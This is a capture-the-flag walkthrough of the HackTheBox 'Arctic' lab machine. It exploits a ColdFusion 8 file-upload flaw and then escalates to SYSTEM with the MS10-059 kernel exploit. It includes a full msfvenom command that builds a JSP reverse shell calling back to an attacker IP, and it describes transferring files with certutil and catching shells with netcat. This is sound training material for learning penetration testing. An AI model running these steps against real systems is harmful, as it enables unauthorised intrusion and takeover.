Hack The Box

HackTheBox “Arctic” Walkthrough

Arctic, an easy-level Windows machine on HackTheBox, presents a straightforward challenge in which an arbitrary file upload vulnerability in the Adobe ColdFusion 8 web application was exploited. By leveraging this…

HackTheBox “Arctic” Walkthrough, figure 1

Arctic, an easy-level Windows machine on HackTheBox, presents a straightforward challenge in which an arbitrary file upload vulnerability in the Adobe ColdFusion 8 web application was exploited. By leveraging this vulnerability, the attacker successfully obtained user-level rights. Furthermore, privilege escalation was achieved through the utilization of a Windows Kernel Exploit.

Let’s get started! 🚀

Recon & Enumeration

Let’s use nmap to scan for open ports and services:

HackTheBox “Arctic” Walkthrough, figure 2

Visit the application on port 8500.

HackTheBox “Arctic” Walkthrough, figure 3

Accessing the /CFIDE directory redirects to an alternate file listing.

HackTheBox “Arctic” Walkthrough, figure 4

Upon selecting the administrator option, an “Adobe ColdFusion 8” application is presented.

HackTheBox “Arctic” Walkthrough, figure 5

Performing a basic searchsploit search reveals the presence of several available exploits.

HackTheBox “Arctic” Walkthrough, figure 6

In addition to using searchsploit, conducting a search on Google also yields potential exploits.

HackTheBox “Arctic” Walkthrough, figure 7

let’s go with the following exploit.

The exploit has been downloaded to our attack box.

HackTheBox “Arctic” Walkthrough, figure 8

It indicates the requirement for a JSP file containing a reverse shell. We can generate one using msfvenom as follows:

Execute the command below to create the JSP payload:

sudo msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.11 lport=4343 -f raw > payload.jsp

HackTheBox “Arctic” Walkthrough, figure 9

Once the payload has been created, we will proceed to execute the script. Please refer to the usage instructions provided:

HackTheBox “Arctic” Walkthrough, figure 10

Before accessing the website, it is necessary to initiate a listener to capture the shell. This can be accomplished using netcat.

HackTheBox “Arctic” Walkthrough, figure 11

After starting the listener, we will proceed to visit the following page:

http://10.10.10.11:8500/userfiles/file/exploit.jsp

HackTheBox “Arctic” Walkthrough, figure 12

Upon accessing the page, a shell is obtained.

HackTheBox “Arctic” Walkthrough, figure 13

As we currently have limited privileges, we need to elevate our access rights. To assist with this, we will use Windows suggester to look for potential exploits. Let’s begin by retrieving the system information using the command “systeminfo”.

HackTheBox “Arctic” Walkthrough, figure 14

We have saved the system information obtained from the target machine in a text file within our attack box. You can download the tool from the following location: Windows Exploit Suggester.

HackTheBox “Arctic” Walkthrough, figure 15

Download the Windows Exploit Suggester’s database file.

HackTheBox “Arctic” Walkthrough, figure 16

Run the suggester using the provided database and system information inputs.

HackTheBox “Arctic” Walkthrough, figure 17

We will proceed with the MS10–059 exploit. You can download the exploit here.

HackTheBox “Arctic” Walkthrough, figure 18

To transfer the executable file to the Windows system, we will set up a Python HTTP server in the directory containing the file.

HackTheBox “Arctic” Walkthrough, figure 19

On the Windows machine, a folder named C:/Temp will be created. Subsequently, we will use certutil to transfer the executable file to this location.

HackTheBox “Arctic” Walkthrough, figure 20

Execute the exploit.

HackTheBox “Arctic” Walkthrough, figure 21

We need to start a listener.

HackTheBox “Arctic” Walkthrough, figure 22

Re-run the exploit, providing the required inputs of the attacking box’s IP address and port.

HackTheBox “Arctic” Walkthrough, figure 23

As a result, a system shell is successfully obtained.

HackTheBox “Arctic” Walkthrough, figure 24

Cheers.